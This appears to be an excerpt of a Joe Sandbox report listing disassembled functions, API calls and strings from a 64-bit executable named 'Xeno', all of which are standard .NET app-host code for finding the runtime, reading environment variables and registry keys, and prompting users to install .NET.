_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEC0D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEC5C

Part of subcall function 00007FF68D5E77D0: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7821
Part of subcall function 00007FF68D5E77D0: __stdio_common_vsnwprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E78F1
Part of subcall function 00007FF68D5E77D0: OutputDebugStringW.KERNEL32 ref: 00007FF68D5E78FA
Part of subcall function 00007FF68D5E77D0: SwitchToThread.KERNEL32 ref: 00007FF68D5E792B
Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E795D
Part of subcall function 00007FF68D5E77D0: fputws.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E796E
Part of subcall function 00007FF68D5E77D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7979
Part of subcall function 00007FF68D5E77D0: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7987

Strings

The required library %s could not be found. Searched with root path [%s], environment variable [%s], default install location [%s], xrefs: 00007FF68D5EE9FF
Error: the default install location cannot be obtained., xrefs: 00007FF68D5EE7EB
fxr, xrefs: 00007FF68D5EE892
Resolved fxr [%s]..., xrefs: 00007FF68D5EE3C0, 00007FF68D5EE743
x64, xrefs: 00007FF68D5EEA6C
hostfxr.dll, xrefs: 00007FF68D5EE341, 00007FF68D5EE526, 00007FF68D5EE6AD, 00007FF68D5EE9F8
Using global installation location [%s] as runtime location., xrefs: 00007FF68D5EE80F
%sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload, xrefs: 00007FF68D5EEA7A
8.0.8, xrefs: 00007FF68D5EEA4A
You must install .NET to run this application., xrefs: 00007FF68D5EEA73
Using environment variable %s=[%s] as runtime location., xrefs: 00007FF68D5EE7BE
Error: the required library %s could not be found in [%s], xrefs: 00007FF68D5EE52D
Error: [%s] does not contain any version-numbered child folders, xrefs: 00007FF68D5EE1FF
Not found, xrefs: 00007FF68D5EEA5B
Considering fxr version=[%s]..., xrefs: 00007FF68D5EDF0D
Reading fx resolver directory=[%s], xrefs: 00007FF68D5EDE40
Detected latest fxr version=[%s]..., xrefs: 00007FF68D5EE31E
host, xrefs: 00007FF68D5EE882

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Process__acrt_iob_func$CurrentDebugEnvironmentErrorLastOutputStringSwitchThreadVariableWow64__stdio_common_vsnwprintf_s__stdio_common_vswprintffputwcfputws
String ID: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload$8.0.8$Considering fxr version=[%s]...$Detected latest fxr version=[%s]...$Error: [%s] does not contain any version-numbered child folders$Error: the default install location cannot be obtained.$Error: the required library %s could not be found in [%s]$Not found$Reading fx resolver directory=[%s]$Resolved fxr [%s]...$The required library %s could not be found. Searched with root path [%s], environment variable [%s], default install location [%s]$Using environment variable %s=[%s] as runtime location.$Using global installation location [%s] as runtime location.$You must install .NET to run this application.$fxr$host$hostfxr.dll$x64
API String ID: 1074774984-1572664868
Opcode ID: 4dc31c3db0618a5b2c192f6cf9b8861f8251da865e32cb85157470ac3f7ebceb
Instruction ID: 207d1ae424abe4a51df62f6892c7920927308b03a5b3fb7e4f3cbaae33be807d
Opcode Fuzzy Hash: 4dc31c3db0618a5b2c192f6cf9b8861f8251da865e32cb85157470ac3f7ebceb
Instruction Fuzzy Hash: BC028462E18A96D1EB00EB64E4402BD2361FF44794F40163BEE5D97AD9EF7CE189C321

Function 00007FF68D5EBD80 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBE2C
GetLastError.KERNEL32 ref: 00007FF68D5EBE3F
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBE99
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC08E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC139
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC23E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC282
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC2D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC327
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC380

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5EBE62, 00007FF68D5EC685
SOFTWARE\dotnet, xrefs: 00007FF68D5EBDD8
InstallLocation, xrefs: 00007FF68D5EC2E3
\Setup\InstalledVersions\, xrefs: 00007FF68D5EC161
_DOTNET_TEST_REGISTRY_PATH, xrefs: 00007FF68D5EBE25, 00007FF68D5EBE5B, 00007FF68D5EBE92
HKEY_CURRENT_USER\, xrefs: 00007FF68D5EBF1B
_DOTNET_TEST_GLOBALLY_REGISTERED_PATH, xrefs: 00007FF68D5EC64B, 00007FF68D5EC67E, 00007FF68D5EC711

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariable$ErrorLast
String ID: Failed to read environment variable [%s], HRESULT: 0x%X$HKEY_CURRENT_USER\$InstallLocation$SOFTWARE\dotnet$\Setup\InstalledVersions\$_DOTNET_TEST_GLOBALLY_REGISTERED_PATH$_DOTNET_TEST_REGISTRY_PATH
API String ID: 2305241113-838692886
Opcode ID: bd03993e2558fc50f3e21a5c2b74fa1683895c55ddb061550c2b27d4635181d9
Instruction ID: d2f75b254e504c56d409eed0396880d21dc94ca18f7da28f2097851b53be3c5d
Opcode Fuzzy Hash: bd03993e2558fc50f3e21a5c2b74fa1683895c55ddb061550c2b27d4635181d9
Instruction Fuzzy Hash: B402A562E18B81C1EB00EB65E4403AD6361FF85794F40563AEEAD97AD9EF7CE084C711

Function 00007FF68D5E7290 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 254
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SwitchToThread.KERNEL32 ref: 00007FF68D5E731B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7334
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E7362
GetLastError.KERNEL32 ref: 00007FF68D5E737B
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E749E
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E74CE
GetLastError.KERNEL32 ref: 00007FF68D5E74D8
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E75BD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7634

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5E73A2, 00007FF68D5E74FF
Unable to open COREHOST_TRACEFILE=%s for writing, xrefs: 00007FF68D5E75EF
COREHOST_TRACE_VERBOSITY, xrefs: 00007FF68D5E7497, 00007FF68D5E74C7, 00007FF68D5E74F8
COREHOST_TRACEFILE, xrefs: 00007FF68D5E735B, 00007FF68D5E739B, 00007FF68D5E73D0

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: EnvironmentVariable$ErrorLast_invalid_parameter_noinfo_noreturn$SwitchThread__acrt_iob_func
String ID: COREHOST_TRACEFILE$COREHOST_TRACE_VERBOSITY$Failed to read environment variable [%s], HRESULT: 0x%X$Unable to open COREHOST_TRACEFILE=%s for writing
API String ID: 3179431274-1641920025
Opcode ID: d74708f292f952ed6c767e8968ee098dc311afd952f5a0b8892f582495c91cf9
Instruction ID: aaf832b4cac9411916243e83f6081dc10c350a6bf5fe916bba0dac74216bd146
Opcode Fuzzy Hash: d74708f292f952ed6c767e8968ee098dc311afd952f5a0b8892f582495c91cf9
Instruction Fuzzy Hash: 85B19D62F14A12C5FB00AB65E8402BD26A1BF48B94F54053BDE1DD7AA4FF7CE489C361

Function 00007FF68D5EC810 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 228
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EC8E9
RegOpenKeyExW.ADVAPI32 ref: 00007FF68D5EC91D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5ECB2E

Part of subcall function 00007FF68D5E7670: __stdio_common_vfwprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E76F4
Part of subcall function 00007FF68D5E7670: fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7702

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5ECB61

Strings

Failed to get the value of the install location registry value. Error code: 0x%X, xrefs: 00007FF68D5ECA4F
The registry key ['%s'] does not exist., xrefs: 00007FF68D5EC93A
Failed to get the size of the install location registry value or it's empty. Error code: 0x%X, xrefs: 00007FF68D5ECADE
Failed to open the registry key. Error code: 0x%X, xrefs: 00007FF68D5EC94D
Looking for architecture-specific registry value in '%s'., xrefs: 00007FF68D5EC8A6
Found registered install location '%s'., xrefs: 00007FF68D5ECA8C

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskOpen__stdio_common_vfwprintffputwc
String ID: Failed to get the size of the install location registry value or it's empty. Error code: 0x%X$Failed to get the value of the install location registry value. Error code: 0x%X$Failed to open the registry key. Error code: 0x%X$Found registered install location '%s'.$Looking for architecture-specific registry value in '%s'.$The registry key ['%s'] does not exist.
API String ID: 1529167557-2871418594
Opcode ID: 1f61457efec5fa3999b0a2cdbe63c0f8d4e5ce3f8421ac04e01c4fe06ab1c5f8
Instruction ID: bf1ce853c4e69f4c8a434543036b2ab83bc475a709e8fc4bc66a7557fea73b28
Opcode Fuzzy Hash: 1f61457efec5fa3999b0a2cdbe63c0f8d4e5ce3f8421ac04e01c4fe06ab1c5f8
Instruction Fuzzy Hash: 8AA1CF62F08A42C5FB10EF65E4502BD2361FF44BA8F40023BDE5D96A98EE7CE449C361

Function 00007FF68D5E2DB0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 179
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF68D5E2DF0
GetProcAddress.KERNEL32 ref: 00007FF68D5E2E08
FreeLibrary.KERNEL32 ref: 00007FF68D5E2E19

Part of subcall function 00007FF68D5E62B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5E102D), ref: 00007FF68D5E640F
Part of subcall function 00007FF68D5E62B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E645D

Part of subcall function 00007FF68D5E2B50: ShellExecuteW.SHELL32 ref: 00007FF68D5E2B74

GetModuleHandleW.KERNEL32 ref: 00007FF68D5E2E5C
FindResourceW.KERNEL32 ref: 00007FF68D5E2E73
FreeLibrary.KERNEL32 ref: 00007FF68D5E3032
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E3070

Strings

comctl32.dll, xrefs: 00007FF68D5E2DE9
Download it nowYou will need to run the downloaded installer, xrefs: 00007FF68D5E2E9F
https://aka.ms/dotnet/app-launch-failed, xrefs: 00007FF68D5E2F5C
Download link:, xrefs: 00007FF68D5E2F9F, 00007FF68D5E2FBC
TaskDialogIndirect, xrefs: 00007FF68D5E2DFE
Learn more:, xrefs: 00007FF68D5E2F2A, 00007FF68D5E2F47
, xrefs: 00007FF68D5E2E48

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Library$Free_invalid_parameter_noinfo_noreturn$AddressConcurrency::cancel_current_taskExecuteFindHandleLoadModuleProcResourceShell
String ID: Download link:$ $Download it nowYou will need to run the downloaded installer$Learn more:$TaskDialogIndirect$comctl32.dll$https://aka.ms/dotnet/app-launch-failed
API String ID: 1361828802-427846389
Opcode ID: 1590cb7845b3659021b245ac932d2ab975ea9fbd28bdfadfe0b2b03f413ea0ed
Instruction ID: 08a4a5be80070acf229136e577ea5c062faaea8cb64d17ee033ad2c1dd70d1ca
Opcode Fuzzy Hash: 1590cb7845b3659021b245ac932d2ab975ea9fbd28bdfadfe0b2b03f413ea0ed
Instruction Fuzzy Hash: 8B815B22B18A41D9EB10DB61E8443AD63A0FF44B94F40453AEE5D87B98EF7CE548C751

Function 00007FF68D5ECB70 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF68D5ECBE6
GetProcAddress.KERNEL32 ref: 00007FF68D5ECBFF

Strings

win8, xrefs: 00007FF68D5ECC5E
ntdll.dll, xrefs: 00007FF68D5ECBDF
win, xrefs: 00007FF68D5ECC82
win81, xrefs: 00007FF68D5ECC4D
RtlGetVersion, xrefs: 00007FF68D5ECBF5
win7, xrefs: 00007FF68D5ECC6F

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll$win$win7$win8$win81
API String ID: 2574300362-238241336
Opcode ID: 20cdc6eb3754abdff701dc275fb3fa083e44d4ca6bce219e8b14929a77ff052f
Instruction ID: 48325338c16a27c71176eec09024e17e77c9014c41ce8697b5157754bb32f361
Opcode Fuzzy Hash: 20cdc6eb3754abdff701dc275fb3fa083e44d4ca6bce219e8b14929a77ff052f
Instruction Fuzzy Hash: EF419031E18642C5EA20AB14E4502796352FF89B90F90413BDD6CC7695FF7CE548D762

Function 00007FF68D5F181C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF68D5F1838
RtlCaptureContext.KERNEL32 ref: 00007FF68D5F1865
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF68D5F187F
RtlVirtualUnwind.KERNEL32 ref: 00007FF68D5F18C0
IsDebuggerPresent.KERNEL32 ref: 00007FF68D5F1914
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF68D5F1931
UnhandledExceptionFilter.KERNEL32 ref: 00007FF68D5F193C

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: a38391418472e8c90f953caece25de29ff60e92270976825603c186ce6f84f77
Instruction ID: 8239a07b65b22ae68089fb4acc026e0391507f25002f0fabe54741ae4c395dc8
Opcode Fuzzy Hash: a38391418472e8c90f953caece25de29ff60e92270976825603c186ce6f84f77
Instruction Fuzzy Hash: F2311A72608B81C6EB609F60E8407EE7364FB84744F44443ADA4E8BB94EF78D64CC721

Function 00007FF68D5E6FE0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E7039
GetLastError.KERNEL32 ref: 00007FF68D5E7045
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5E70A8
_wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF68D5E711D
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF68D5E713A
_gmtime64_s.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF68D5E7161
wcsftime.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF68D5E717C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7211
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E7257

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5E706C
Tracing enabled @ %s, xrefs: 00007FF68D5E71CC
%c GMT, xrefs: 00007FF68D5E716C
COREHOST_TRACE, xrefs: 00007FF68D5E7032, 00007FF68D5E7065, 00007FF68D5E70A1

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$ErrorLast_gmtime64_s_time64_wtoiwcsftime
String ID: %c GMT$COREHOST_TRACE$Failed to read environment variable [%s], HRESULT: 0x%X$Tracing enabled @ %s
API String ID: 29591814-1875902258
Opcode ID: a008973eed72be1559eaaec080d773f3390b42f5d001d5943a734892eda6fa95
Instruction ID: fc161f1381cd2317dac7eba538fbf24facfddbc8ba10fc0fd5124184a5f8b19a
Opcode Fuzzy Hash: a008973eed72be1559eaaec080d773f3390b42f5d001d5943a734892eda6fa95
Instruction Fuzzy Hash: 4871BC62A18B42D1EB10DB25E44026E6361FF84BD4F50423BED5D876A8FF7CE589C711

Function 00007FF68D5E1B70 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Getwctype.LIBCPMT ref: 00007FF68D5E1D41

Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68D5E1BDB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF68D5E1C23
_Getctype.LIBCPMT ref: 00007FF68D5E1C3B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1C8C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1C9F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1CB2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1CC5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1CD8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68D5E1CEB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68D5E1CF9

Strings

bad locale name, xrefs: 00007FF68D5E1D1C

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: free$std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_malloc
String ID: bad locale name
API String ID: 3869375685-1405518554
Opcode ID: 0c98c05a6d440e719c0856b4f51288344e191d52904679a6af0c60a2d54902c9
Instruction ID: d1861b897e8e6581fb91a36cf80a7e04f2aa0dfe7782191eb53284aa5262d1b0
Opcode Fuzzy Hash: 0c98c05a6d440e719c0856b4f51288344e191d52904679a6af0c60a2d54902c9
Instruction Fuzzy Hash: EF517922B09B41CAFB54DBA0D4506BC3374FF54748F08413ADE4DAAA55EF38E55AD321

Function 00007FF68D5EBB10 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBB71
GetLastError.KERNEL32 ref: 00007FF68D5EBB7D
GetCurrentProcess.KERNEL32 ref: 00007FF68D5EBBB1
IsWow64Process.KERNEL32 ref: 00007FF68D5EBBBF
GetEnvironmentVariableW.KERNEL32 ref: 00007FF68D5EBC20
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EBD47

Strings

Failed to read environment variable [%s], HRESULT: 0x%X, xrefs: 00007FF68D5EBBA0
_DOTNET_TEST_DEFAULT_INSTALL_PATH, xrefs: 00007FF68D5EBB6A, 00007FF68D5EBB99, 00007FF68D5EBC19
ProgramFiles, xrefs: 00007FF68D5EBBD7
ProgramFiles(x86), xrefs: 00007FF68D5EBBCE
dotnet, xrefs: 00007FF68D5EBCE5

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: EnvironmentProcessVariable$CurrentErrorLastWow64_invalid_parameter_noinfo_noreturn
String ID: Failed to read environment variable [%s], HRESULT: 0x%X$ProgramFiles$ProgramFiles(x86)$_DOTNET_TEST_DEFAULT_INSTALL_PATH$dotnet
API String ID: 2226353477-3944960975
Opcode ID: 72232a43526ab3dd8352fe22f4e28bccabbe42b48578a77dadcbc7b9ef9d0ca9
Instruction ID: 1345de9db1ff8f3fe1a2bd946f92eaaba6b51c2068eff580893bb50b4816ed88
Opcode Fuzzy Hash: 72232a43526ab3dd8352fe22f4e28bccabbe42b48578a77dadcbc7b9ef9d0ca9
Instruction Fuzzy Hash: A3616261A08642C1EB20AF15E4402BA63A5FF44BD1F44023BDE5DCB6A9EF7CE549C762

Function 00007FF68D5E8A50 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8C35
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8CB5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF68D5E3BE1), ref: 00007FF68D5E8DC7

Part of subcall function 00007FF68D5E62B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5E102D), ref: 00007FF68D5E640F
Part of subcall function 00007FF68D5E62B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E645D

Strings

x64, xrefs: 00007FF68D5E8B77
&rid=, xrefs: 00007FF68D5E8BB8, 00007FF68D5E8BD4
win10, xrefs: 00007FF68D5E8C67
&arch=, xrefs: 00007FF68D5E8B47, 00007FF68D5E8B63
missing_runtime=true, xrefs: 00007FF68D5E8AE5, 00007FF68D5E8B01
&os=, xrefs: 00007FF68D5E8D17
https://aka.ms/dotnet-core-applaunch?, xrefs: 00007FF68D5E8AA0

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

